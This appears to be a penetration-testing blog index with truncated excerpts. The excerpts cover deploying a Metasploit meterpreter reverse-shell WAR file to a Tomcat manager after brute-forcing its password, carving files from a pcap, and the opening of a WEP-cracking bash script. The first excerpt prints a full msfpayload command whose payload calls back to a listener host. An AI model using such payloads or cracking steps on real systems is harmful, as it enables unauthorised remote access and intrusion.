Uncategorized

So, you’ve just brute forced the admin password for the Tomcat web app manager and you want to take it a step further…. step in metasploit.

msfpayload can create a WAR file containing a payload which you can upload to the target and exploit the box.

1./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=4545 W >; /root/MetRev.war

Log into the interface at http://192.168.1.112:8080/manager/html and upload the payload.

Once uploaded you then need to connect… Continue reading

So on a job i had captured some data transfer off the wire but wanted to put some proof of that in the report and for some brownie points.

I wasn’t entirely sure what tool to use but a quick google pointed me in the direction of foremost.

The pcap was captured in wireshark so i opened it up again and found the correct TCP stream that contained what… Continue reading

I have wrote an automated WEP cracking script (matts-wepcrack.sh). Let me know if you have any improvements.

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134#!/bin/bash # wepcrack.sh v1.3 # Create by Matthew Phillips # New versions can be downloaded from www.phillips321.co.uk VERSION="1.3" # # This tool requires aircrack-ng tools to be installed and run as root # # ChangeLog.... # Version 1.3 - Randomises interface MAC address # Version 1.2 - Set txpower of card to 1000mw… Continue reading